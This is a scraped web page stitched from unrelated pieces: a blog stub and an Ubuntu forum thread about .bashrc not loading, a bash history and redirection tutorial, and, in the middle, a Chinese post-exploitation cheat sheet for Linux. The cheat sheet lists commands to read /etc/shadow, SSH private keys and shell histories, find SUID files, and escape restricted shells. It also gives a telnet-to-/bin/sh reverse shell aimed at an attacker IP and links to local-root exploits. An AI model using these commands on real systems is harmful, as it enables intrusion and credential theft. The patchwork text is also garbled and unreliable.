温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
阅读(168)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'求助关于 bash- -root-.bashrc- Permission denied',
blogAbstract:'求助关于 bash: /root/.bashrc: Permission denied一台比较老的系统,记不得是啥版本的了,反正是2.4的内核。上面跑的服务更老,上面有10多年前一个老大搞的计数器,cgi的,看了一下可能也没有源代码(几年前迁移机器是直接把二进制文件copy过去的,apache还是1.3的)。想把web服务从apache换成nginx的,图个内存占用小一些,于是上nginx网站找了个CGI到FastCGI的封装。没有直接在在用的服务器上试,先在虚拟机上搭了环境跑了一下看是正常的,然后再到那台机器上做,运行这个脚本的时候报了个错:bash: /root/.bashrc: Permission denied出错的命令如下:su -c \'/usr/local/nginx/cgi.pl && /usr/local/nginx/logs/cgi.log 2&&1 &\' -s \'',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:0,
publishTime:0,
permalink:'blog/static/',
commentCount:1,
mainCommentCount:1,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}lightdm无法登录,shell登录后发现不执行.bashrc,求解? - 查看主题 & Ubuntu中文论坛
&[ 12 篇帖子 ]&
&文章标题 : lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
10:01帖子: 980地址: 帝都
系统: Ubuntu 12.XX
前两天源里xserver-xorg-* 有一次升级,升级完重启结果X就悲剧了:开机会进入Low graphic模式,可以手动启动lightdm服务,而且分辨率也正常,但就是无法登录(输入密码登陆后马上跳回登陆界面),尝试修复(准确说是尝试联网)无果后,果断重装系统。下的12.04 Alternate daily build,装完后X没有问题了,但lightdm问题依旧:登陆后黑屏,出现几行字——Cannot write bytes: broken pipe,最后一行是 Stop System V compatibility,然后立马跳回登录界面。不过我可以使用Guest账户登录,看来是家目录的配置文件出了问题。另外,我切换到tty下登录系统后,发现~/.bashrc、 ~/.profile根本没有被执行,因为.bashrc中设置的几个别名(如 ll)没有生效,我在.profile中设置的几个环境变量也不存在。我在syslog日志中检查不到错误,X日志也没有任何错误高手能否帮忙诊断一下 问题可能出在那些文件?登录系统在加载.bashrc和.profile前还会读取哪些文件呢?我不觉得是显卡驱动的问题,而且重装系统后显示也恢复了正常。我的显卡是ATI Radeon 4250 HD集显,主板映泰TA880G(擦这主板的密码保护就是个渣,直接回车就能无视密码……),还有一个小细节就是我发现主板时间出了问题,突然错了好几个小时~~
没找到合适的板块发帖,或许该移到新手区?
_________________Ubuntu技巧汇总 --你遇到的各种问题可能已经在里面了我的技术博客Code tells you how, comments should tell you why.
9:35,总共编辑了 1 次
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
1:05帖子: 14674地址: Tencent
系统: Mac OS X
传说中的non-login...
_________________twitter求fo:博客求踩:
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
10:01帖子: 980地址: 帝都
系统: Ubuntu 12.XX
tty下登录也可以是non-login shell吗?
_________________Ubuntu技巧汇总 --你遇到的各种问题可能已经在里面了我的技术博客Code tells you how, comments should tell you why.
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
21:55帖子: 58436地址: 长沙
guest当然使用dash重装的系统,使用的老的/home/xxx? 用户名和id都对上的?
_________________● 鸣学
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
10:01帖子: 980地址: 帝都
系统: Ubuntu 12.XX
对 老的/home/cherrot 用户名和id没有检查,晚上回去检查一下,/etc所在分区是格式化过的,重装之前的userid是默认的1000
_________________Ubuntu技巧汇总 --你遇到的各种问题可能已经在里面了我的技术博客Code tells you how, comments should tell you why.
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
4:56帖子: 975
系统: Ubuntu QQ
送出感谢: 0 次
你都没有登录成功,系统凭什么给你执行.bashrc和.profile,简直岂有此理
_________________添加ppa后只更新此ppa:update-ppa()
{ sudo apt-get update -o Dir::Etc::sourcelist=&sources.list.d/$1.list& -o Dir::Etc::sourceparts=&-& -o APT::Get::List-Cleanup=&0&
}写入~/.bashrc,source一下,就可以直接用,是不是很方便?觉得方便就按个赞。
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
10:01帖子: 980地址: 帝都
系统: Ubuntu 12.XX
lightdm登陆不成功,但tty是可以正常登陆的,我说的没有执行.bashrc和.profile也是指的tty下,不然我怎么知道没有执行.bashrc和.profile?目前lightdm登陆问题解决了,通过逐一排查log,终于在 /var/log/upstart/lightdm.log 中找到了原因:代码:** (process:4824): WARNING **: Error reading existing Xauthority: Error opening file: Permission deniedError writing X authority: Error opening file '/home/cherrot/.Xauthority': Permission denied但tty的问题还没有解决,引用:的确如饭团所说,是non-login的 不是non-login的问题,而是登陆后不执行.bashrc的问题……而且奇葩的是运行命令 bash --login 咋个也不管用呢?
_________________Ubuntu技巧汇总 --你遇到的各种问题可能已经在里面了我的技术博客Code tells you how, comments should tell you why.
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
4:56帖子: 975
系统: Ubuntu QQ
送出感谢: 0 次
Cherrot 写道:lightdm登陆不成功,但tty是可以正常登陆的,我说的没有执行.bashrc和.profile也是指的tty下,不然我怎么知道没有执行.bashrc和.profile?目前lightdm登陆问题解决了,通过逐一排查log,终于在 /var/log/upstart/lightdm.log 中找到了原因:代码:** (process:4824): WARNING **: Error reading existing Xauthority: Error opening file: Permission deniedError writing X authority: Error opening file '/home/cherrot/.Xauthority': Permission denied但tty的问题还没有解决,引用:的确如饭团所说,是non-login的 不是non-login的问题,而是登陆后不执行.bashrc的问题……而且奇葩的是运行命令 bash --login 咋个也不管用呢?登录之后看看.bashrc和.profile是否可读吧
_________________添加ppa后只更新此ppa:update-ppa()
{ sudo apt-get update -o Dir::Etc::sourcelist=&sources.list.d/$1.list& -o Dir::Etc::sourceparts=&-& -o APT::Get::List-Cleanup=&0&
}写入~/.bashrc,source一下,就可以直接用,是不是很方便?觉得方便就按个赞。
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
10:01帖子: 980地址: 帝都
系统: Ubuntu 12.XX
问题解决了,我都不好意思说了……从一个fresh的ubuntu里找到了 .profile (啥时侯开始默认会创建.profile的……),载入 .bashrc的操作是在.profile中定义的……把.profile拷贝到家目录下就行了很多事情往往都是特别简单,但一着急,一犯二,就搞复杂了……
_________________Ubuntu技巧汇总 --你遇到的各种问题可能已经在里面了我的技术博客Code tells you how, comments should tell you why.
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
4:56帖子: 975
系统: Ubuntu QQ
送出感谢: 0 次
肯定你没把问题说清楚,你一开始说.profile不会被执行,那为什么拷贝一个raw的.profile就可以执行了?还是你原来的.profile有问题
_________________添加ppa后只更新此ppa:update-ppa()
{ sudo apt-get update -o Dir::Etc::sourcelist=&sources.list.d/$1.list& -o Dir::Etc::sourceparts=&-& -o APT::Get::List-Cleanup=&0&
}写入~/.bashrc,source一下,就可以直接用,是不是很方便?觉得方便就按个赞。
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
10:01帖子: 980地址: 帝都
系统: Ubuntu 12.XX
我在 .profile 里修改了 $PATH,但shell登陆进去后 $PATH 没有变化,所以我才说 .bashrc和 .profile都没有执行当时X在/etc下的配置也坏掉了,所以重装了系统。重装系统后症状还是一样,我就把一个新装ubuntu的家目录的配置(除了和用户验证有关的)全部拷贝到我的家目录了。然后就修好了
这才解决了问题
_________________Ubuntu技巧汇总 --你遇到的各种问题可能已经在里面了我的技术博客Code tells you how, comments should tell you why.
&文章标题 : Re: lightdm无法登录,shell登录后发现不执行.bashrc,求解?发表于 :
23:21帖子: 13160地址:
系统: Debian stable AMD64
用 X 会话 ,用 .xsession 才是正道。
_________________?????箪食瓢饮随遇安,不求栋梁求参天。一门牛逼的编程语言。
显示帖子 : 全部帖子1天7天2周1个月3个月6个月1年&排序 作者发表时间文章标题 升序降序&
&[ 12 篇帖子 ]&
正在浏览此版面的用户:没有注册用户 和 3 位游客
您 不能 在这个版面发表主题您 不能 在这个版面回复主题您 不能 在这个版面编辑帖子您 不能 在这个版面删除帖子您 不能 在这个版面提交附件
选择一个版面
------------------
公告/注意事项
& &新闻和通知
& &校园社团支持
& && &华东校区
& && &华南校区
& && &华北校区
& && &华中校区
& && &东北校区
& && &西北校区
& && &港澳台校区
& && &国外校区
& &软件推荐
& &非常任务
系统安装区
& &教学和常见问答
& && &课堂教学和培训
& &初学者园地 - 16.10 - Yakkety Yak
& &系统安装和升级
& && &新立得和软件源
& && &Wubi安装讨论
& &启动和引导
& &网卡问题以及网络和拨号
& && &校园网拨号
& &笔记本、UMPC支持
& &手机和平板
& && &Ubuntu移动应用开发
& &常用硬件支持
& &系统架构支持
配置美化区
& &字体美化和中文支持
& && &个人配置文件存放点
& &桌面特效
& &窗口管理器
& &屏幕抓图
& &办公、图像、机械电子设计等
& && &Vim和Emacs
& &因特网相关软件
& &影音多媒体
& &Wine及其分支
& &游戏和游戏模拟器
& &虚拟机和虚拟化
& &其它类软件
& &开源模板库
服务器管理
& &服务器基础应用
& &数据库管理
& &服务器维护和硬件相关
& &Ubuntu VPS
参与Ubuntu开发
& &软件和文档翻译
& &编译或打包
& &Ubuntu错误报告
程序设计区
& &Shell脚本
& >K+和QT
& &软件/网站开发
& && &Python/Php/Perl
& && &C/C++/Java
& &内核及嵌入式开发
& &开源小工具
& &Ubuntu 17.04
& &Ubuntu 16.04 LTS
& &Ubuntu 14.04 LTS
& &Ubuntu 12.04 LTS
& &Ubuntu 10.04 LTS
& &老旧版本支持
& && &Ubuntu 15.10
& && &Ubuntu 15.04
& && &Ubuntu 14.10
衍生发行版
& &Ubuntu GNOME
& &Kubuntu
& &Xubuntu & Lubuntu
& &Ubuntu中文衍生版
& && &UbuntuKylin
& &Ubuntu国外衍生版
& && &Mint
& &Ubuntu衍生版制作
& &其它类Unix OS发行版
& && &Arch发行版
& && &Debian发行版
& && &OpenSUSE发行版
& && &Deepin
& &深度PK版
& &Ubuntu故事和感慨
& &Full Circle开源杂志
分享交流区
& &同城交流
& &线下活动专版
& &Ubuntu宣传推广
& &论坛管理
& && && &Ubuntu中文网上商店史上最全Linux提权后获取敏感信息方法
系统是什么版本?
cat&/etc/issue
主机上有哪些工作计划?
crontab&-l
ls&-alh&/var/spool/cron
ls&-al&/etc/&|&grep&cron
ls&-al&/etc/cron*
cat&/etc/cron*
cat&/etc/at.allow
cat&/etc/at.deny
cat&/etc/cron.allow
cat&/etc/cron.deny
cat&/etc/crontab
cat&/etc/anacrontab
cat&/var/spool/cron/crontabs/root
主机上可能有哪些纯文本用户名和密码?
grep&-i&user&[filename]
grep&-i&pass&[filename]
grep&-C&5&"password"&[filename]
find&.&-name&"*.php"&-print0&|&xargs&-0&grep&-i&-n&"var&$password"&&&#&Joomla
通信与网络
NIC(s),系统有哪些?它是连接到哪一个网络?
/sbin/ifconfig&-a
cat&/etc/network/interfaces
cat&/etc/sysconfig/network
网络配置设置是什么?网络中有什么样的服务器?DHCP服务器?DNS服务器?网关?
cat&/etc/resolv.conf
cat&/etc/sysconfig/network
cat&/etc/networks
iptables&-L
dnsdomainname
其他用户主机与系统的通信?
lsof&-i&:80
grep&80&/etc/services
netstat&-antup
netstat&-antpx
netstat&-tulpn
chkconfig&--list
chkconfig&--list&|&grep&3:on
缓存?IP和/或MAC地址?
/sbin/route&-nee
数据包可能嗅探吗?可以看出什么?监听流量
#&tcpdump&tcp&dst&[ip]&[port]&and&tcp&dst&[ip]&[port]
tcpdump&tcp&dst&192.168.1.7&80&and&tcp&dst&10.2.2.222&21
你如何get一个shell?你如何与系统进行交互?
#&/-linux-shells-using-built-in-tools/
nc&-lvp&4444&&&&#&Attacker.&输入&(命令)
nc&-lvp&4445&&&&#&Attacker.&输出(结果)
telnet&[atackers&ip]&44444&|&/bin/sh&|&[local&ip]&44445&&&&#&在目标系统上.&使用&攻击者的IP!
如何端口转发?(端口重定向)
#&/port-forwarding-with-rinetd-on-debian-etch
#&FPipe.exe&-l&[local&port]&-r&[remote&port]&-s&[local&port]&[local&IP]
FPipe.exe&-l&80&-r&80&-s&80&192.168.1.7
#&ssh&-[L/R]&[local&port]:[remote&ip]:[remote&port]&[local&user]@[local&ip]
ssh&-L&.0.1:80&root@192.168.1.7&&&&#&Local&Port
ssh&-R&.0.1:80&root@192.168.1.7&&&&#&Remote&Port
#&mknod&backpipe&p&;&nc&-l&-p&[remote&port]&&&backpipe&&|&nc&[local&IP]&[local&port]&&backpipe
mknod&backpipe&p&;&nc&-l&-p&8080&&&backpipe&|&nc&10.1.1.251&80&&backpipe&&&&#&Port&Relay
mknod&backpipe&p&;&nc&-l&-p&8080&0&&&&&backpipe&|&tee&-a&inflow&|&nc&localhost&80&|&tee&-a&outflow&1&backpipe&&&&#&Proxy&(Port&80&to&8080)
backpipe&p&;&nc&-l&-p&8080&0&&&&&backpipe&|&tee&-a&inflow&|&nc
localhost&80&|&tee&-a&outflow&&&1&backpipe&&&&#&Proxy&monitor&(Port&80&to&8080)
建立隧道可能吗?本地,远程发送命令
ssh&-D&127.0.0.1:9050&-N&[username]@[ip]
proxychains&ifconfig
秘密信息和用户
你是谁?哪个id登录?谁已经登录?还有谁在这里?谁可以做什么呢?
cat&/etc/passwd&|&cut&-d:&&&&#&List&of&users
grep&-v&-E&"^#"&/etc/passwd&|&awk&-F:&'$3&==&0&{&print&$1}'&&&#&List&of&super&users
awk&-F:&'($3&==&"0")&{print}'&/etc/passwd&&&#&List&of&super&users
cat&/etc/sudoers
可以找到什么敏感文件?
cat&/etc/passwd
cat&/etc/group
cat&/etc/shadow
ls&-alh&/var/mail/
什么有趣的文件在home/directorie(S)里?如果有权限访问
ls&-ahlR&/root/
ls&-ahlR&/home/
是否有任何密码,脚本,数据库,配置文件或日志文件?密码默认路径和位置
cat&/var/apache2/config.inc
cat&/var/lib/mysql/mysql/user.MYD
cat&/root/anaconda-ks.cfg
用户做过什么?是否有任何密码呢?他们有没有编辑什么?
cat&~/.bash_history
cat&~/.nano_history
cat&~/.atftp_history
cat&~/.mysql_history
cat&~/.php_history
可以找到什么样的用户信息
cat&~/.bashrc
cat&~/.profile
cat&/var/mail/root
cat&/var/spool/mail/root
private-key
信息能否被发现?
cat&~/.ssh/authorized_keys
cat&~/.ssh/identity.pub
cat&~/.ssh/identity
cat&~/.ssh/id_rsa.pub
cat&~/.ssh/id_rsa
cat&~/.ssh/id_dsa.pub
cat&~/.ssh/id_dsa
cat&/etc/ssh/ssh_config
cat&/etc/ssh/sshd_config
cat&/etc/ssh/ssh_host_dsa_key.pub
cat&/etc/ssh/ssh_host_dsa_key
cat&/etc/ssh/ssh_host_rsa_key.pub
cat&/etc/ssh/ssh_host_rsa_key
cat&/etc/ssh/ssh_host_key.pub
cat&/etc/ssh/ssh_host_key
哪些用户可以写配置文件在/
etc /?能够重新配置服务?
ls&-aRl&/etc/&|&awk&‘$1&~&/^.*w.*/'&2&/dev/null&&&&&#&Anyone
ls&-aRl&/etc/&|&awk&’$1&~&/^..w/'&2&/dev/null&&&&&&&&#&Owner
ls&-aRl&/etc/&|&awk&‘$1&~&/^.....w/'&2&/dev/null&&&&#&Group
ls&-aRl&/etc/&|&awk&’;$1&~&/w.$/'&2&/dev/null&&&&&&&&&&#&Other
find&/etc/&-readable&-type&f&2&/dev/null&&&&&&&&&&&&&&&&&&&&&&&&&#&Anyone
find&/etc/&-readable&-type&f&-maxdepth&1&2&/dev/null&&&#&Anyone
/有什么可以发现?
ls&-alh&/var/log
ls&-alh&/var/mail
ls&-alh&/var/spool
ls&-alh&/var/spool/lpd
ls&-alh&/var/lib/pgsql
ls&-alh&/var/lib/mysql
cat&/var/lib/dhcp3/dhclient.leases
网站上的任何隐藏配置/文件?配置文件与数据库信息?
ls&-alhR&/var/www/
ls&-alhR&/srv/www/htdocs/
ls&-alhR&/usr/local/www/apache22/data/
ls&-alhR&/opt/lampp/htdocs/
ls&-alhR&/var/www/html/
有什么在日志文件里?(什么能够帮助到“本地文件包含”?)
#&/2011/08/linux-var-log-files/
cat&/etc/httpd/logs/access_log
cat&/etc/httpd/logs/access.log
cat&/etc/httpd/logs/error_log
cat&/etc/httpd/logs/error.log
cat&/var/log/apache2/access_log
cat&/var/log/apache2/access.log
cat&/var/log/apache2/error_log
cat&/var/log/apache2/error.log
cat&/var/log/apache/access_log
cat&/var/log/apache/access.log
cat&/var/log/auth.log
cat&/var/log/chttp.log
cat&/var/log/cups/error_log
cat&/var/log/dpkg.log
cat&/var/log/faillog
cat&/var/log/httpd/access_log
cat&/var/log/httpd/access.log
cat&/var/log/httpd/error_log
cat&/var/log/httpd/error.log
cat&/var/log/lastlog
cat&/var/log/lighttpd/access.log
cat&/var/log/lighttpd/error.log
cat&/var/log/lighttpd/lighttpd.access.log
cat&/var/log/lighttpd/lighttpd.error.log
cat&/var/log/messages
cat&/var/log/secure
cat&/var/log/syslog
cat&/var/log/wtmp
cat&/var/log/xferlog
cat&/var/log/yum.log
cat&/var/run/utmp
cat&/var/webmin/miniserv.log
cat&/var/www/logs/access_log
cat&/var/www/logs/access.log
ls&-alh&/var/lib/dhcp3/
ls&-alh&/var/log/postgresql/
ls&-alh&/var/log/proftpd/
ls&-alh&/var/log/samba/
auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log,
mail.log, mail.warn, messages, syslog, udev,
wtmp(有什么文件?log.系统引导……)
如果命令限制,你可以打出哪些突破它的限制?
python&-c&'import&pty.spawn("/bin/bash")'
echo&os.system('/bin/bash')
/bin/sh&-i
如何安装文件系统?
是否有挂载的文件系统?
cat&/etc/fstab
什么是高级Linux文件权限使用?Sticky
bits, SUID 和GUID
find&/&-perm&-1000&-type&d&2&/dev/null&&&&#&Sticky&bit&-&Only&the&owner&of&the&directory&or&the&owner&of&a&file&can&delete&or&rename&here
find&/&-perm&-g=s&-type&f&2&/dev/null&&&&#&SGID&(chmod&2000)&-&run&as&the&&group,¬&the&user&who&started&it.
find&/&-perm&-u=s&-type&f&2&/dev/null&&&&#&SUID&(chmod&4000)&-&run&as&the&&owner,¬&the&user&who&started&it.
find&/&-perm&-g=s&-o&-perm&-u=s&-type&f&2&/dev/null&&&&#&SGID&or&SUID
for&i&in&`locate&-r&"bin$"`;&do&find&$i&(&-perm&-4000&-o&-perm&-2000&)&-type&f&2&/dev/&done&&&&#
Looks&in&'common'&places:&/bin,&/sbin,&/usr/bin,&/usr/sbin,
/usr/local/bin,&/usr/local/sbin&and&any&other&*bin,&for&SGID&or&SUID
(Quicker&search)
findstarting&at&root&(/),&SGIDorSUID,¬&Symbolic&links,&only&3
folders&deep,&list&with&more&detail&and&hideany&errors&(e.g.&permission
find/-perm&-g=s-o-perm&-4000!&-type&l-maxdepth&3&-exec&ls&-ld&{}&;2&/dev/null
在哪些目录可以写入和执行呢?几个“共同”的目录:/
tmp目录,/var / tmp目录/ dev /shm目录
find&/&-writable&-type&d&2&/dev/null&&&&&&&&#&world-writeable&folders
find&/&-perm&-222&-type&d&2&/dev/null&&&&&&#&world-writeable&folders
find&/&-perm&-o+w&-type&d&2&/dev/null&&&&#&world-writeable&folders
find&/&-perm&-o+x&-type&d&2&/dev/null&&&&#&world-executable&folders
find&/&(&-perm&-o+w&-perm&-o+x&)&-type&d&2&/dev/null&&&#&world-writeable&&&executable&folders
Any&"problem"&files?可写的的,“没有使用"的文件
find&/&-xdev&-type&d&(&-perm&-0002&-a&!&-perm&-1000&)&-print&&&#&world-writeable&files
find&/dir&-xdev&(&-nouser&-o&-nogroup&)&-print&&&#&Noowner&files
准备和查找漏洞利用代码
安装了什么开发工具/语言/支持?
find&/&-name&perl*
find&/&-name&python*
find&/&-name&gcc*
find&/&-name&cc
如何上传文件?
find&/&-name&wget
find&/&-name&nc*
find&/&-name&netcat*
find&/&-name&tftp*
find&/&-name&ftp
查找exploit代码
http://www.
http://www.exploitsearch.net
http://seclists.org/fulldisclosure/
查找更多有关漏洞的信息
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]]http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
/cve-details.php?cvename=[CVE]]/cve-details.php?cvename=[CVE]
http://www.91ri.org/
(快速)“共同的“exploit,预编译二进制代码文件
http://tarantula.by.ru/localroot/
http://www./file/local-root-exploit-priv9/
上面的信息很难吗?
快去使用第三方脚本/工具来试试吧!
系统怎么打内核,操作系统,所有应用程序,插件和Web服务的最新补丁?
apt-get&update&&&&apt-get&upgrade
yum&update
服务运行所需的最低的权限?
例如,你需要以root身份运行MySQL?
能够从以下网站找到自动运行的脚本?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
(快速)指南和链接
/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
/2011/04/quick-guide-to-linux-privilege.html
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。winxpxp 的BLOG
用户名:winxpxp
文章数:29
访问量:2168
注册日期:
阅读量:5863
阅读量:12276
阅读量:348287
阅读量:1047735
51CTO推荐博文
一、命令历史1. history命令使用如果你经常使用Linux命令,那么使用history命令无疑会提升你的工作效率。history命令主要用于显示历史指令记录内容,下达历史记录中的指令。bash会记录此前用户在shell会话中执行的命令于缓冲区中,正常退出时会被记录于当前用户家目录下隐藏文件~/.bash_history中。当我们以bash登录Linux主机之后,系统会主动从当前用户家目录的~/.bash_history文件读取以前用过的命令,那么其文件会记录几条数据呢?历史命令是被保存在内存中的,当退出或者登录shell时,会自动保存或读取。在内存中,历史命令仅能够存储1000条历史命令,该数量通过echo $HISTSIZE可以知道。历史命令在账户注销时,会将最近的HISTSIZE条记录到当前账户的记录文件中。环境变量:&&& echo $HISTFILE&&&&&&&&&&&&&& &-- 命令历史文件存放路径&&& echo $HISTSIZE&&&&&&&&&&&&& &-- 命令历史输出的记录数,即输出~/.bash_history文件中的最后HISTSIZE行&&& echo $HISTFILESIZE&&&&&& &-- 定义了~/.bash_history文件中保存命令的记录总数,可以理解为.bash_history文件中最多只有HISTFILESIZE行用例:(1) history4执行结果:列出目前缓冲区内最近HISTSIZE行历史命令(2) history Cc4执行结果:清空当前shell中的所有历史命令(3) history n4执行结果:打印最近的n条历史命令[root@www ~]# history 10 & & & & 991& vim ~/.vimrc & & & & 992& vim ~/.bashrc & & & & 993& vi ~/.bashrc & & & & 994& ll -a & & & & 995& . ~/.vimrc & & & & 996& exit & & & & 997& quit & & & & 998& exit & & & & 999& history & & & 1000& history 10(4) history -w4执行结果:立即将当前历史命令缓冲区命令写入历史命令文件中,仅保留最新的(5) history -a4执行结果:将当前新增命令手动追加至历史命令文件中(6) history -r4执行结果:将历史命令文件中的命令读入当前历史命令缓冲区(7) history Cd #4执行结果:删除指定的历史命令[root@www ~]# history -d 10382. 调用过去执行的命令(1) !number4执行结果:调用历史缓冲区内的第几条命令[root@www ~]# !1038 & & & ll & & & total 10884 & & & -rw-------. 1 root root&&&& 2048 Aug 17 20:03 anaconda-ks.cfg & & & -rw-r--r--. 1 root root
Sep 16 15:04 etc.tgz & & & -rw-r--r--. 1 root root&&& 63620 Aug 17 20:03 install.log & & & -rw-r--r--. 1 root root&&& 11949 Aug 17 19:56 install.log.syslog(2) !string4执行结果:搜寻历史缓冲区内最近一个以string开头命令,并执行[root@www ~]# !de & & & declare |wc -l & & & 108(3) !!4执行结果:重复执行上一条命令(4) Ctrl+r4执行结果:使用反向查询历史命令,将匹配的最新一条显示出来,如果还想继续向上查询,继续按Ctrl+r[root@www ~]# history 3&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& -02 16:35:52 history 3 & & &-02 16:36:11 head ~/.bash_history & & & -02 16:41:05 history 3 & & & (reverse-i-search)`his': head ~/.bash_history3. 调用过去执行的命令的最后一个参数ESC+.二、通配符(1) *匹配任意长度的任意字符(代表0个到无穷多个任意字符),如 *.conf,a*b(2) ?匹配任意单个字符,如 ?abc?.txt(3)[ ]/[-]匹配指定范围内的任意单个字符,如[1-8],[l,i,n,u,x](4)[^]匹配指定范围外的任意单个字符,如[^A-Z]三、特殊符号(1) #批注符号,常用在shell script中,视为说明注释,不会被执行。#!/bin/bashbash脚本引导符号,即bash编译起始语句。(2) \转义符号,将“特殊字符或通配符”还原成一般字符放在指令前,取消其别名的作用放在指令最末端,表示指令连接下一行(3) |管道符号,把上条指令的标准输出,作为下条指令的标准输入。如:set | grep ‘HIST’(4) ;连续命令执行分隔符,连续性命令的界定。 &如:cd /;cp /etc/sysconfig/. /lab(5) ~用户的家目录(6) $变量符号,提取变量。正则表达式中表示行尾(7) &单个&符号,且放在完整指令列的最后端,即表示将该指令列放入后台中工作。如:tar cvfz data.tar.gz data & /dev/null&(8) !逻辑非符号,如:ls a[!0-9] 表示显示除a0,a2,…a9以外的文件。(9) /目录符号,路径分隔符号。运算中,代表除法的符号。(10) ‘ ’单引号表示把它所包含的内容作为普通字符,无特殊例外。如:[root@www ~]# echo There are some '$animals' & & &&&&&&&& There are some $animals(11) “ ”双引号具有变量置换的功能。如:[root@www ~]# echo There are some "$animals" & & &&&&&&&& There are some cat(12) ` `反单引号,表示包含其内的命令可以执行,也可以使用$( )。如:fdv=`date +%F`;echo "Today $fdv"(13) ( )用括号将一串连续指令括起来,这种用法对 shell 来说,称为指令群组。如下面的例子:(cd ~ ; vcgh=`pwd` ;echo $vcgh),指令群组有一个特性,shell会以产生 subshell来执行这组指令。因此,在其中所定义的变量,仅作用于指令群组本身。(14) { }大括号被运用到函数的功能上,它在当前shell执行,不会产生subshell此外,大括号还有另一种用法,如下{xx,yy,zz,...},这种大括号的组合,常用在字串的组合上,来看个例子mkdir {userA,userB,userC}-{home,bin,data}我们得到 userA-home, userA-bin, userA-data, userB-home, userB-bin,userB-data, userC-home, userC-bin,userC-data,这几个目录。(15) **次方运算符如:[root@www lab]# let sus=2**3 & & &[root@www lab]# echo sus=$sus & & & sus=8四、数据流重定向1. 什么是标准输出与标准错误输出?standard output标准输出指的是命令执行所回传的正确的信息。standard error output标准错误输出指的是命令执行失败后,所回传的错误信息。2. 什么数据重定向?由于不管正确或错误的数据都是默认输出到屏幕上,所以屏幕比较混乱。而数据重定向可以将stdout与stderr分别传送到其他的文件或设备去。(1) 标准输入(stdin): 代码为0,使用&或&&;(2) 标准输出(stdout): 代码为1,使用&或&&;(3) 标准错误输出(stderr): 代码为2,使用2&或2&&。3. 正确数据重定向文件的方式[root@www ~]# ll -ah & rootfile.pos & & &a. 该文件若不存在,系统会自动将它创建起来;b. 当这个文件存在的时候,那么系统就会先将这个文件内容清空,然后再将数据写入;c. 若以&输出到一个已存在的文件中,那个文件就会被覆盖掉;d. 追加内容到该文件中,须用&&输出,原文件里的内容不会丢失。如:[root@www ~]# ll -ah /lab && rootfile.pos4. 错误数据重定向文件的方式[root@www ~]# su - Allen & & &[Allen@www ~]$ find /home -name .bashrc & & & find: `/home/abc': Permission denied & & & find: `/home/lost+found': Permission denied & & & /home/Allen/.bashrc & & & find: `/home/bash': Permission denied & & & find: `/home/basher': Permission denied & & & find: `/home/rainman': Permission denied & & & find: `/home/nologin': Permission denied & & & find: `/home/hadoop': Permission denied & & & find: `/home/testbash': Permission denied这些错误信息如何在屏幕不会出现呢?使用2&或2&&来覆盖或累加至指定文件中,可以方便分别将错误信息与正确数据输出到不同文件内。[Allen@www ~]$ find /home -name .bashrc & list.good 2& list_err & & 5. 同时重定向标准输出流和错误输出流: & &&&&& COMMAND & /path/to/file.out 2& /path/to/file.err&&&&& COMMAND & /path/to/file.out 2&&1& 定向输出流&&&&& COMMAND && /path/to/file.out 